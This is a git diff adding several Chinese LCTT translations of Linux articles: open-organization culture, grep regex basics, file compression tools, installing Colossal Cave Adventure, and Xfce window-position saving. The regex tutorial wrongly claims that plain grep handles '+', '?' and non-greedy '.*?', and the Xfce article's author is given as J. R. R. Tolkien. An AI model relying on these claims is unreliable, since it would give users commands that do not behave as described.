[2] https://www.cyberciti.biz/tips/linux-send-wake-on-lan-wol-magic-packets.html
|
||||
[3] //www.cyberciti.biz/faq/unix-ping-command-examples/ (See Linux/Unix ping command examples for more info)
|
||||
[4] https://www.cyberciti.biz/faq/apple-os-x-wake-on-lancommand-line-utility/
|
@ -0,0 +1,43 @@
|
||||
手把手教你构建开放式文化
|
||||
======
|
||||
我们于 2015 年发表 `开放组织 (Open Organization)` 后,很对各种类型不同大小的公司都对“开放式”文化究竟意味着什么感到好奇。甚至当我跟别的公司谈论我们产品和服务的优势时,也总是很快就从谈论技术转移到人和文化上去了。几乎所有对推动创新和保持行业竞争优势有兴趣的人都在思考这个问题。
|
||||
|
||||
不是只有高级领导团队 (Senior leadership teams) 才对开放式工作感兴趣。[红帽公司最近一次调查 ][1] 发现 [81% 的受访者 ][2] 同意这样一种说法:"拥有开放式的组织文化对我们公司非常重要。"
|
||||
|
||||
然而要注意的是。同时只有 [67% 的受访者 ][3] 认为:"我们的组织有足够的资源来构建开放式文化。"
|
||||
|
||||
这个结果与我从其他公司那交流所听到的相吻合:人们希望在开放式文化中工作,他们只是不知道该怎么做。对此我表示同情,因为组织的行事风格是很难捕捉,评估,和理解的。在 [Catalyst-In-Chief][4] 中,我将其称之为 "组织中最神秘莫测的部分。"
|
||||
|
||||
开放式组织之所以让人神往是因为在这个数字化转型有望改变传统工作方式的时代,拥抱开放文化是保持持续创新的最可靠的途径。当我们在书写本文的时候,我们所关注的是描述在红帽公司中兴起的那种文化--而不是编写一本如何操作的书。我们并不会制定出一步步的流程来让其他组织采用。
|
||||
|
||||
这也是为什么与其他领导者和高管谈论他们是如何开始构建开放式文化的会那么有趣。在创建开发组织时,很多高管会说我们要"改变我们的文化"。但是文化并不是一项输入。它是一项输出--它是人们互动和日常行为的副产品。
|
||||
|
||||
告诉组织成员"更加透明地工作","更多地合作",以及 "更加包容地行动" 并没有什么作用。因为像 "透明," "合作," and "包容" 这一类的文化特质并不是行动。他们只是组织内指导行为的价值观而已。
|
||||
|
||||
纳入要如何才能构建开放式文化呢?
|
||||
|
||||
在过去的两年里,Opensource.com 设计收集了各种以开放的精神来进行工作,管理和领导的最佳实践方法。现在我们在新书 [The Open Organization Workbook][5] 中将之分享出来,这是一本更加规范的引发文化变革的指引。
|
||||
|
||||
要记住,任何改变,尤其是巨大的改变,都需要许诺 (commitment),耐心,以及努力的工作。我推荐你在通往伟大成功的大道上先使用这本工作手册来实现一些微小的,有意义的成果。
|
||||
|
||||
通过阅读这本书,你将能够构建一个开放而又富有创新的文化氛围,使你们的人能够茁壮成长。我已經迫不及待想听听你的故事了。
|
||||
|
||||
本文摘自 [Open Organization Workbook project][6]。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/open-organization/17/12/whitehurst-workbook-introduction
|
||||
|
||||
作者:[Jim Whitehurst][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/jwhitehurst
|
||||
[1]:https://www.redhat.com/en/blog/red-hat-releases-2017-open-source-culture-survey-results
|
||||
[2]:https://www.techvalidate.com/tvid/923-06D-74C
|
||||
[3]:https://www.techvalidate.com/tvid/D30-09E-B52
|
||||
[4]:https://opensource.com/open-organization/resources/catalyst-in-chief
|
||||
[5]:https://opensource.com/open-organization/resources/workbook
|
||||
[6]:https://opensource.com/open-organization/17/8/workbook-project-announcement
|
@ -0,0 +1,151 @@
|
||||
Bash 脚本:学习使用正则表达式(基础)
|
||||
======
|
||||
正则表达式(简写为 regex 或者 regexp)基本上是定义一种搜索模式的字符串,可以被用来执行“搜索”或者“搜索并替换”操作,也可以被用来验证像密码策略等条件。
|
||||
|
||||
正则表达式是一个我们可利用的非常强大的工具,并且使用正则表达式最好的事情是它能在几乎所有计算机语言中被使用。所以如果你使用 Bash 脚本或者创建一个 python 程序时,我们可以使用正则表达式或者也可以写一个单行搜索查询。
|
||||
|
||||
在这篇教程中,我们将会学习一些正则表达式的基本概念,并且学习如何在 Bash 中使用‘grep’时使用它们,但是如果你希望在其他语言如 python 或者 C 中使用它们,你只能使用正则表达式部分。那么让我们通过正则表达式的一个例子开始吧,
|
||||
|
||||
**Ex-** 一个正则表达式看起来像
|
||||
|
||||
**/t[aeiou]l/**
|
||||
|
||||
但这是什么意思呢?它意味着所提到的正则表达式将寻找一个词,它以‘t’开始,在中间包含字母‘a e i o u’中任意一个,并且字母‘l’最为最后一个字符。它可以是‘tel’,‘tal’或者‘til’,匹配可以是一个单独的词或者其它单词像‘tilt’,‘brutal’或者‘telephone’的一部分。
|
||||
|
||||
**grep 使用正则表达式的语法是**
|
||||
|
||||
**$ grep "regex_search_term" file_location**
|
||||
|
||||
如果头脑中没有想法,不要担心,这只是一个例子,来展示可以利用正则表达式获取什么,并且相信我这是最简单的例子。我们可以从正则表达式中获取更多。现在我们将从正则表达式基础的开始。
|
||||
|
||||
**(推荐阅读: [你应该知道的有用的 linux 命令][1])**
|
||||
|
||||
## **基础的正则表示式**
|
||||
|
||||
现在我们开始学习一些被称为元字符(MetaCharacters)的特殊字符。他们帮助我们创建更复杂的正则表达式搜索项。下面提到的是基本元字符的列表,
|
||||
|
||||
**. or Dot** 将匹配任意字符
|
||||
|
||||
**[ ]** 将匹配范围内字符
|
||||
|
||||
**[^ ]** 将匹配除了括号中提到的那个之外的所有字符
|
||||
|
||||
***** 将匹配零个或多个前面的项
|
||||
|
||||
**+** 将匹配一个或多个前面的项
|
||||
|
||||
**? ** 将匹配零个或一个前面的项
|
||||
|
||||
**{n}** 将匹配‘n’次前面的项
|
||||
|
||||
**{n,}** 将匹配‘n’次或更多前面的项
|
||||
|
||||
**{n m} ** 将匹配在‘n’和‘m’次之间的项
|
||||
|
||||
**{ ,m}** 将匹配少于或等于‘m’次的项
|
||||
|
||||
**\ ** 是一个转义字符,当我们需要在我们的搜索中包含一个元字符时使用
|
||||
|
||||
现在我们将用例子讨论所有这些元字符。
|
||||
|
||||
### **. or Dot**
|
||||
|
||||
它用于匹配出现在我们搜索项中的任意字符。举个例子,我们可以使用点如
|
||||
|
||||
**$ grep "d.g" file1**
|
||||
|
||||
这个正则表达式意味着我们在‘file_name’文件中正查找的词以‘d’开始,以‘g’结尾,中间可以有任意字符。同样,我们可以使用任意数量的点作为我们的搜索模式,如
|
||||
|
||||
**T ……h**
|
||||
|
||||
这个查询项将查找一个词,以‘T’开始,以‘h’结尾,并且中间可以有任意 6 个字符。
|
||||
|
||||
### **[ ]**
|
||||
|
||||
方括号用于定义字符的范围。 例如,我们需要搜索一些特别的单词而不是匹配任何字符,
|
||||
|
||||
**$ grep "N[oen]n" file2**
|
||||
|
||||
这里,我们正寻找一个单词,以‘N’开头,以‘n’结尾,并且中间只能有‘o’,‘e’或者‘n’中的一个。 在方括号中我们可以提到单个到任意数量的字符。
|
||||
|
||||
我们在方括号中也可以定义像‘a-e’或者‘1-18’作为匹配字符的列表。
|
||||
|
||||
### **[^ ]**
|
||||
|
||||
这就像正则表达式的 not 操作。当使用 [^ ] 时,它意味着我们的搜索将包括除了方括号内提到的所有字符。例如,
|
||||
|
||||
**$ grep "St[^1-9]d" file3**
|
||||
|
||||
这意味着我们可以拥有所有这样的单词,它们以‘St’开始,以字母‘d’结尾,并且不得包含从1到9的任何数字。
|
||||
|
||||
到现在为止,我们只使用了仅需要在中间查找单个字符的正则表达式的例子,但是如果我们需要看的更多该怎么办呢。假设我们需要找到以一个字符开头和结尾的所有单词,并且在中间可以有任意数量的字符。这就是我们使用乘数(multiplier)元字符如 + * & ? 的地方。
|
||||
|
||||
{n},{n. m},{n , } 或者 { ,m} 也是可以在我们的正则表达式项中使用的其他乘数元字符。
|
||||
|
||||
### * (星号)
|
||||
|
||||
以下示例匹配字母k的任意出现次数,包括一次没有:
|
||||
|
||||
**$ grep "lak*" file4**
|
||||
|
||||
它意味着我们可以匹配到‘lake’,‘la’或者‘lakkkk’
|
||||
|
||||
### +
|
||||
|
||||
以下模式要求字符串中的字母k至少被匹配到一次:
|
||||
|
||||
**$ grep "lak+" file5**
|
||||
|
||||
这里k 在我们的搜索中至少需要发生一次,所以我们的结果可以为‘lake’或者‘lakkkk’,但不能是‘la’。
|
||||
|
||||
### **?**
|
||||
|
||||
在以下模式匹配中
|
||||
|
||||
**$ grep "ba?b" file6**
|
||||
|
||||
字符串 bb 或 bab,使用‘?’乘数,我们可以有一个或零个字符的出现。
|
||||
|
||||
### **非常重要的提示:**
|
||||
|
||||
当使用乘数时这是非常重要的,假设我们有一个正则表达式
|
||||
|
||||
**$ grep "S.*l" file7**
|
||||
|
||||
我们得到的结果是‘small’,‘silly’,并且我们也得到了‘Shane is a little to play ball’。但是为什么我们得到了‘Shane is a little to play ball’,我们只是在搜索中寻找单词,为什么我们得到了整个句子作为我们的输出。
|
||||
|
||||
这是因为它满足我们的搜索标准,它以字母‘s’开头,中间有任意数量的字符并以字母‘l’结尾。那么,我们可以做些什么来纠正我们的正则表达式来只是得到单词而不是整个句子作为我们的输出。
|
||||
|
||||
我们在正则表达式中需要增加 ? 元字符,
|
||||
|
||||
**$ grep "S.*?l" file7**
|
||||
|
||||
这将会纠正我们正则表达式的行为。
|
||||
|
||||
### **\ or Escape characters**
|
||||
|
||||
\ 是当我们需要包含一个元字符或者对正则表达式有特殊含义的字符的时候来使用。例如,我们需要找到所有以点结尾的单词,所以我们可以使用
|
||||
|
||||
**$ grep "S.*\\." file8**
|
||||
|
||||
这将会查找和匹配所有以一个点字符结尾的词。
|
||||
|
||||
通过这篇基本正则表达式教程,我们现在有一些关于正则表达式如何工作的基本概念。在我们的下一篇教程中,我们将学习一些高级的正则表达式的概念。同时尽可能多地练习,创建正则表达式并试着尽可能多地在你的工作中加入它们。如果有任何疑问或问题,您可以在下面的评论区留言。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://linuxtechlab.com/bash-scripting-learn-use-regex-basics/
|
||||
|
||||
作者:[SHUSAIN][a]
|
||||
译者:[kimii](https://github.com/kimii)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://linuxtechlab.com/author/shsuain/
|
||||
[1]:http://linuxtechlab.com/useful-linux-commands-you-should-know/
|
||||
|
||||
|
||||
|
||||
|
||||
|
@ -0,0 +1,115 @@
|
||||
如何优雅的使用大部分的 Linux 文件压缩
|
||||
=======
|
||||
如果你对 linux 系统下的对文件压缩命令或操作的有效性有任何疑问 ,你应该看一下 **apropos compress** 这个命令的输出 ;如果你有机会这么做 ,你会惊异于有如此多的的命令来进行压缩文件和解压缩文件 ;还有许多命令来进行压缩文件的比较 ,检验 ,并且能够在压缩文件中的内容中进行搜索 ,甚至能够把压缩文件从一个格式变成另外一种格式 ( *.z 格式变为 *.gz 格式 ) 。
|
||||
你想在所有词目中寻找一组 bzip2 的压缩命令 。包括 zip ,gzip ,和 xz 在内 ,你将得到一个有意思的操作。
|
||||
|
||||
```
|
||||
$ apropos compress | grep ^bz
|
||||
bzcat (1) - decompresses files to stdout
|
||||
bzcmp (1) - compare bzip2 compressed files
|
||||
bzdiff (1) - compare bzip2 compressed files
|
||||
bzegrep (1) - search possibly bzip2 compressed files for a regular expression
|
||||
bzexe (1) - compress executable files in place
|
||||
bzfgrep (1) - search possibly bzip2 compressed files for a regular expression
|
||||
bzgrep (1) - search possibly bzip2 compressed files for a regular expression
|
||||
bzip2 (1) - a block-sorting file compressor, v1.0.6
|
||||
bzless (1) - file perusal filter for crt viewing of bzip2 compressed text
|
||||
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
|
||||
```
|
||||
|
||||
在我的Ubuntu系统上 ,列出了超过 60 条命令作为 apropos compress 命令的返回 。
|
||||
|
||||
## 压缩算法
|
||||
压缩并没有普适的方案 ,某些压缩工具是有损耗的压缩 ,例如能够使 mp3 文件减小大小而能够是听者有接近聆听原声的音乐感受 。但是 Linux 命令行能够用算法使压缩文件或档案文件能够重新恢复为原始数据 ,换句话说 ,算法能够使压缩或存档无损 。
|
||||
|
||||
这是如何做到的 ?300 个相同的在一行的相同的字符能够被压缩成像 “300x” 。但是这种算法不会对大多数的文件产生有效的益处 。因为文件中完全随机的序列要比相同字符的序列要多的多 。 压缩算法会越来越复杂和多样 ,所以在 Unix 早期 ,压缩是第一个被介绍的 。
|
||||
|
||||
## 在 Linux 系统上的压缩命令
|
||||
在 Linux 系统上最常用的压缩命令是 zip ,gzip ,bzip2 ,xz 。 前面提到的常用压缩命令以同样的方式工作 。会权衡文件内容压缩程度 ,压缩花费的时间 ,压缩文件在其他你需要使用的系统上的兼容性 。
|
||||
一些时候压缩一个文件并不会花费很多时间和性能 。在下面的例子中 ,被压缩的文件会比原始文件要大 。当在一个不是很普遍的情况下 ,尤其是在文件内容达到一定等级的随机度 。
|
||||
|
||||
```
|
||||
$ time zip bigfile.zip bigfile
|
||||
adding: bigfile (default 0% )
|
||||
real 0m0.055s
|
||||
user 0m0.000s
|
||||
sys 0m0.016s
|
||||
$ ls -l bigfile*
|
||||
-rw-r--r-- 1 root root 0 12月 20 22:36 bigfile
|
||||
-rw------- 1 root root 164 12月 20 22:41 bigfile.zip
|
||||
```
|
||||
注意压缩后的文件 ( bigfile.zip ) 比源文件 ( bigfile ) 要大 。如果压缩增加了文件的大小或者减少的很少的百分比 ,那就只剩下在线备份的好处了 。如果你在压缩文件后看到了下面的信息 。你不会得到太多的益处 。
|
||||
( defalted 1% )
|
||||
|
||||
文件内容在文件压缩的过程中有很重要的作用 。在上面文件大小增加的例子中是因为文件内容过于随机 。压缩一个文件内容只包含 0 的文件 。你会有一个相当震惊的压缩比 。在如此极端的情况下 ,三个常用的压缩工具都有非常棒的效果 。
|
||||
|
||||
```
|
||||
-rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt
|
||||
-rw-rw-r-- 1 shs shs 49 Dec 8 17:28 zeroes.txt.bz2
|
||||
-rw-rw-r-- 1 shs shs 10219 Dec 8 17:28 zeroes.txt.gz
|
||||
-rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz
|
||||
-rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip
|
||||
```
|
||||
你不会喜欢为了查看文件中的 50 个字节的而将 10 0000 0000 字节的数据完全解压 。这样是及其不可能的 。
|
||||
在更真实的情况下 ,大小差异是总体上的不同 -- 不是重大的效果 -- 对于一个小的公正的 jpg 的图片文件 。
|
||||
|
||||
```
|
||||
-rw-r--r-- 1 shs shs 13522 Dec 11 18:58 image.jpg
|
||||
-rw-r--r-- 1 shs shs 13875 Dec 11 18:58 image.jpg.bz2
|
||||
-rw-r--r-- 1 shs shs 13441 Dec 11 18:58 image.jpg.gz
|
||||
-rw-r--r-- 1 shs shs 13508 Dec 11 18:58 image.jpg.xz
|
||||
-rw-r--r-- 1 shs shs 13581 Dec 11 18:58 image.jpg.zip
|
||||
```
|
||||
|
||||
在压缩拉的文本文件时 ,你会发现重要的不同 。
|
||||
```
|
||||
$ ls -l textfile*
|
||||
-rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile
|
||||
-rw-rw-r-- 1 shs shs 1519807 Dec 11 18:41 textfile.bz2
|
||||
-rw-rw-r-- 1 shs shs 1977669 Dec 11 18:41 textfile.gz
|
||||
-rw-rw-r-- 1 shs shs 1024700 Dec 11 18:41 textfile.xz
|
||||
-rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip
|
||||
```
|
||||
|
||||
在这种情况下 ,XZ 相较于其他压缩文件有效的减小了文件的大小 ,对于第二的 bzip2 命令也有很大的提高
|
||||
|
||||
## 查看压缩文件
|
||||
|
||||
以 more 结尾的命令能够让你查看压缩文件而不解压文件 。
|
||||
|
||||
```
|
||||
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
|
||||
lzmore (1) - view xz or lzma compressed (text) files
|
||||
xzmore (1) - view xz or lzma compressed (text) files
|
||||
zmore (1) - file perusal filter for crt viewing of compressed text
|
||||
```
|
||||
这些命令在大多数工作中被使用 ,自从不得不使文件解压缩而只为了显示给用户 。在另一方面 ,留下被解压的文件在系统中 。这些命令简单的使文件解压缩 。
|
||||
|
||||
```
|
||||
$ xzmore textfile.xz | head -1
|
||||
Here is the agenda for tomorrow's staff meeting:
|
||||
```
|
||||
|
||||
## 比较压缩文件
|
||||
许多的压缩工具箱包含一个差异命令 ( 例如 :xzdiff ) 。这些工具通过这些工作来进行比较和差异而不是做算法指定的比较 。例如 ,xzdiff 命令比较 bz2 类型的文件和比较 xz 类型的文件一样简单 。
|
||||
|
||||
## 如何选择最好的 Linux 压缩工具
|
||||
如何选择压缩工具取决于你工作 。在一些情况下 ,选择取决于你所压缩的数据内容 。在更多的情况下 ,取决你你组织的惯例 ,除非你对磁盘空间有着很高的敏感度 。下面是一般的建议 :
|
||||
zip :文件需要被分享或者会在 Windows 系统下使用 。
|
||||
gzip :文件在 Unix/Linux 系统下使用 。长远来看 ,bzip2 是普遍存在的 。
|
||||
bzip2 :使用了不同的算法 ,产生比 gzip 更小的文件 ,但是花更长的时间 。
|
||||
xz :一般提供做好的压缩率 ,但是也会花费相当的时间 。比其他工具更新 ,可能在你工作的系统上不存在 。
|
||||
|
||||
## 注意
|
||||
当你在压缩文件时,你有很多选择 ,在极少的情况下 ,会产生无效的磁盘存储空间。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html
|
||||
|
||||
作者 :[ Sandra Henry-Stocker ][1] 译者:[ singledp ][2] 校对:校对者ID
|
||||
|
||||
本文由 [ LCTT ][3]原创编译,Linux中国 荣誉推出
|
||||
|
||||
[1]:https://www.networkworld.com
|
||||
[2]:https://github.com/singledo
|
||||
[3]:https://github.com/LCTT/TranslateProject
|
@ -0,0 +1,115 @@
|
||||
最有名的经典文字冒险游戏
|
||||
======
|
||||
**<ruby>巨洞冒险<rt>Colossal Cave Adventure</rt></ruby>**,又名 **ADVENT**、**Clossal Cave** 或 **Adventure**,是八十年代初到九十年代末最受欢迎的基于文字的冒险游戏。这款游戏还作为史上第一款“<ruby>互动小说<rt>interactive fiction</rt></ruby>”类游戏而闻名。在 1976 年,一个叫 **Will Crowther** 的程序员开发了这款游戏的一个早期版本,之后另一位叫 **Don Woods** 的程序员改进了这款游戏,为它添加了许多新元素,包括计分系统以及更多的幻想角色和场景。这款游戏最初是为 **PDP-10** 开发的,这是一个历史悠久的大型计算机。后来,它被移植到普通家用台式电脑上,比如 IBM PC 和 Commodore 64。游戏的最初版使用 Fortran 开发,之后在八十年代初它被微软加入到 MS-DOS 1.0 当中。
|
||||
|
||||
![](https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.jpeg)
|
||||
|
||||
1995 年发布的最终版本 **Adventure 2.5** 从来没有可用于现代操作系统的安装包。它已经几乎绝版。万幸的是,在多年之后身为开源运动提倡者的 **Eric Steven Raymond** 得到了原作者们的同意之后将这款经典游戏移植到了现代操作系统上。他把这款游戏开源并将源代码以 **”open-adventure“** 之名托管在 GitLab 上。
|
||||
|
||||
你在这款游戏的主要目标是找到一个传言中藏有大量宝藏和金子的洞穴并活着离开它。玩家在这个虚拟洞穴中探索时可以获得分数。一共可获得的分数是 430 点。这款游戏的灵感主要来源于原作者 **Will Crowther** 丰富的洞穴探索的经历。他曾经积极地在洞穴中冒险,特别是肯塔基州的<ruby>猛犸洞<rt>Mammoth Cave</rt></ruby>。因为游戏中的洞穴结构大体基于猛犸洞,你也许会注意到游戏中的场景和现实中的猛犸洞的相似之处。
|
||||
|
||||
### 安装巨洞冒险
|
||||
|
||||
Open Adventure 在 [**AUR**][1] 上有面对 Arch 系列操作系统的安装包。所以我们可以在 Arch Linux 或者像 Antergos 和 Manjaro Linux 等基于 Arch 的发行版上使用任何 AUR 辅助程序安装这款游戏。
|
||||
|
||||
使用 [**Pacaur**][2]:
|
||||
```
|
||||
pacaur -S open-adventure
|
||||
```
|
||||
|
||||
使用 [**Packer**][3]:
|
||||
```
|
||||
packer -S open-adventure
|
||||
```
|
||||
|
||||
使用 [**Yaourt**][4]:
|
||||
```
|
||||
yaourt -S open-adventure
|
||||
```
|
||||
|
||||
在其他 Linux 发行版上,你也许需要经过如下步骤来从源代码编译并安装这款游戏。
|
||||
|
||||
首先安装依赖项:
|
||||
|
||||
在 Debian 和 Ubuntu 上:
|
||||
```
|
||||
sudo apt-get install python3-yaml libedit-dev
|
||||
```
|
||||
|
||||
在 Fedora 上:
|
||||
```
|
||||
sudo dnf install python3-PyYAML libedit-devel
|
||||
```
|
||||
|
||||
你也可以使用 pip 来安装 PyYAML:
|
||||
```
|
||||
sudo pip3 install PyYAML
|
||||
```
|
||||
|
||||
安装好依赖项之后,用以下命令从源代码编译并安装 open-adventure:
|
||||
```
|
||||
git clone https://gitlab.com/esr/open-adventure.git
|
||||
```
|
||||
```
|
||||
make
|
||||
```
|
||||
```
|
||||
make check
|
||||
```
|
||||
|
||||
最后,运行 ‘advent’ 程序开始游戏:
|
||||
```
|
||||
advent
|
||||
```
|
||||
|
||||
在 [**Google Play store**][5] 上还有这款游戏的安卓版。
|
||||
|
||||
### 游戏说明
|
||||
|
||||
要开始游戏,只需在终端中输入这个命令:
|
||||
```
|
||||
advent
|
||||
```
|
||||
|
||||
你会看到一个欢迎界面。按 “y” 来查看教程,或者按 “n“ 来开始冒险之旅。
|
||||
|
||||
![][6]
|
||||
|
||||
游戏在一个小砖房前面开始。玩家需要使用由一到两个简单的英语单词单词组成的命令来控制角色。要移动角色,只需输入 **in**、 **out**、**enter**、**exit**、**building**、**forest**、**east**、**west**、**north**、**south**、**up** 或 **down** 等指令。
|
||||
|
||||
比如说,如果你输入 **”south“** 或者简写 **”s“**,游戏角色就会向当前位置的南方移动。注意每个单词只有前五个字母有效,所以当你需要输入更长的单词时需要使用缩写,比如要输入 **northeast** 时,只需输入 NE(大小写均可)。要输入 **southeast** 则使用 SE。要捡起物品,输入 **pick**。要进入一个建筑物或者其他的场景,输入 **in**。要从任何场景离开,输入 **exit**,诸如此类。当你遇到危险时你会受到警告。你也可以使用两个单词的短语作为命令,比如 **”eat food“**、**”drink water“**、**”get lamp“**、**”light lamp“**、**”kill snake“** 等等。你可以在任何时候输入 **”help“** 来显示游戏帮助。
|
||||
|
||||
![][8]
|
||||
|
||||
我花了一整个下午来探索这款游戏。天哪,这真是段超级有趣、激动人心又紧张刺激的冒险体验!
|
||||
|
||||
![][9]
|
||||
|
||||
我打通了许多关卡并在路上探索了各式各样的场景。我甚至找到了金子,还被一条蛇和一个矮人袭击过。我必须承认这款游戏真是非常让人上瘾,简直是最好的时间杀手。
|
||||
|
||||
如果你安全地带着财宝离开了洞穴,你会取得游戏胜利,并获得财宝全部的所有权。你在找到财宝的时候也会获得部分的奖励。要提前离开你的冒险,输入 **”quit“**。要暂停冒险,输入 **”suspend“**(或者 ”pause“ 或 ”save“)。你可以在之后继续冒险。要看你现在的进展如何,输入 **”score“**。记住,被杀或者退出会导致丢分。
|
||||
|
||||
祝你们玩得开心!再见!
|
||||
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.ostechnix.com/colossal-cave-adventure-famous-classic-text-based-adventure-game/
|
||||
|
||||
作者:[SK][a]
|
||||
译者:[yixunx](https://github.com/yixunx)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.ostechnix.com/author/sk/
|
||||
[1]:https://aur.archlinux.org/packages/open-adventure/
|
||||
[2]:https://www.ostechnix.com/install-pacaur-arch-linux/
|
||||
[3]:https://www.ostechnix.com/install-packer-arch-linux-2/
|
||||
[4]:https://www.ostechnix.com/install-yaourt-arch-linux/
|
||||
[5]:https://play.google.com/store/apps/details?id=com.ecsoftwareconsulting.adventure430
|
||||
[6]:https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png
|
||||
[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png
|
||||
[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-3.png
|
||||
[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.png
|
@ -0,0 +1,68 @@
|
||||
在 Xfce 会话中保存窗口的位置
|
||||
======
|
||||
摘要:如果你发现 Xfce session 不能保存窗口的位置,那么启用 `save on logout` 然后登出再进来一次,可能就能修复这个问题了 (permanently, if you like keeping the same session and turn saving back off again)。 下面是详细内容。
|
||||
|
||||
我用 Xfce 作桌面有些年头了,但是每次重启后进入之前保存的 session 时总会有问题出现。 登陆后, 之前 session 中保存的应用都会启动, 但是所有的工作区和窗口位置数据会丢失, 导致所有应用都堆在默认工作区中,乱糟糟的。
|
||||
|
||||
多年来,很多人都报道过这个问题( Ubuntu, Xfce, 以及 Red Hat 的 bug 追踪系统中都有登记这个 bug)。 虽然 Xfce4.10 中已经修复过了一个相关 bug, 但是我用的 Xfce4.12 依然有这个问题。 如果不是我的其中一个系统能够正常的回复各个窗口的位置,我几乎都要放弃找出问题的原因了(事实上我之前已经放弃过很多次了)。
|
||||
|
||||
今天,我深入对比了两个系统的不同点,最终解决了这个问题。 我现在就把结果写出来, 以防有人也遇到相同的问题。
|
||||
|
||||
提前的一些说明:
|
||||
|
||||
1。由于这个笔记本只有我在用,因此我几乎不登出我的 Xfce session。 我一般只是休眠然后唤醒,除非由于要对内核打补丁才进行重启, 或者由于某些改动损毁了休眠镜像导致系统从休眠中唤醒时卡住了而不得不重启。 另外,我也很少使用 Xfce 工具栏上的重启按钮重启; 一般我只是运行一下 `reboot`。
|
||||
|
||||
2。我会使用 xterm 和 Emacs, 这些 X 应用写的不是很好,无法记住他们自己的窗口位置。
|
||||
|
||||
Xfce 将 sessions 信息保存到主用户目录中的 `.cache/sessions` 目录中。在经过仔细检查后发现,在正常的系统中有两类文件存储在该目录中,而在非正常的系统中,只有一类文件存在该目录下。
|
||||
|
||||
其中一类文件的名字类似 `xfce4-session-hostname:0` 这样的,其中包含的内容类似下面这样的:
|
||||
```
|
||||
Client9_ClientId=2a654109b-e4d0-40e4-a910-e58717faa80b
|
||||
Client9_Hostname=local/hostname
|
||||
Client9_CloneCommand=xterm
|
||||
Client9_RestartCommand=xterm,-xtsessionID,2a654109b-e4d0-40e4-a910-e58717faa80b
|
||||
Client9_Program=xterm
|
||||
Client9_UserId=user
|
||||
|
||||
```
|
||||
|
||||
这个文件记录了所有正在运行的程序。如果你进入 Settings -> Session and Startup 并清除 session 缓存, 就会删掉这种文件。 当你保存当前 session 时, 又会创建这种文件。 这就是 Xfce 知道要启动哪些应用的原因。 但是请注意,上面并没有包含任何窗口位置的信息。 (我还曾经以为可以根据 session ID 来找到其他地方的一些相关信息,但是失败了)。
|
||||
|
||||
正常工作的系统在目录中还有另一类文件,名字类似 `xfwm4-2d4c9d4cb-5f6b-41b4-b9d7-5cf7ac3d7e49.state` 这样的。 其中文件内容类似下面这样:
|
||||
```
|
||||
[CLIENT] 0x200000f
|
||||
[CLIENT_ID] 2a9e5b8ed-1851-4c11-82cf-e51710dcf733
|
||||
[CLIENT_LEADER] 0x200000f
|
||||
[RES_NAME] xterm
|
||||
[RES_CLASS] XTerm
|
||||
[WM_NAME] xterm
|
||||
[WM_COMMAND] (1) "xterm"
|
||||
[GEOMETRY] (860,35,817,1042)
|
||||
[GEOMETRY-MAXIMIZED] (860,35,817,1042)
|
||||
[SCREEN] 0
|
||||
[DESK] 2
|
||||
[FLAGS] 0x0
|
||||
|
||||
```
|
||||
|
||||
注意这里的 geometry 和 desk 记录的正是我们想要的窗口位置以及工作区号。因此不能保存窗口位置的原因就是因为缺少这个文件。
|
||||
|
||||
继续深入下去,我发现当你明确地手工保存 sessino 时,智慧保存第一个文件而不会保存第二个文件。 但是当登出保存 session 时则会保存第二个文件。 因此, 我进入 Settings -> Session and Startup 中,在 Genral 标签页中启用登出时自动保存 session, 然后登出后再进来, 然后 tada, 第二个文件出现了。 再然后我又关闭了登出时自动保存 session。( 因为我一般在排好屏幕后就保存一个 session, 但是我不希望做出的改变也会影响到这个保存的 session, 如有必要我会明确地手工进行保存), 现在 我的窗口位置能够正常的回复了。
|
||||
|
||||
这也解释了为什么有的人会有问题而有的人没有问题: 有的人可能一直都是用登出按钮重启,而有些人则是手工重启(或者仅仅是由于系统漰溃了才重启)。
|
||||
|
||||
顺带一提,这类问题, 以及为解决问题而付出的努力正是我赞同为软件存储的状态文件编写 man 页或其他类似文档的原因。 为用户编写文档,不仅能帮助别人深入挖掘产生奇怪问题的原因, 也能让软件作者注意到软件中那些奇怪的东西, 比如将 session 状态存储到两个独立的文件中去。
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.eyrie.org/~eagle/journal/2017-12/001.html
|
||||
|
||||
作者:[J. R. R. Tolkien][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.eyrie.org
|
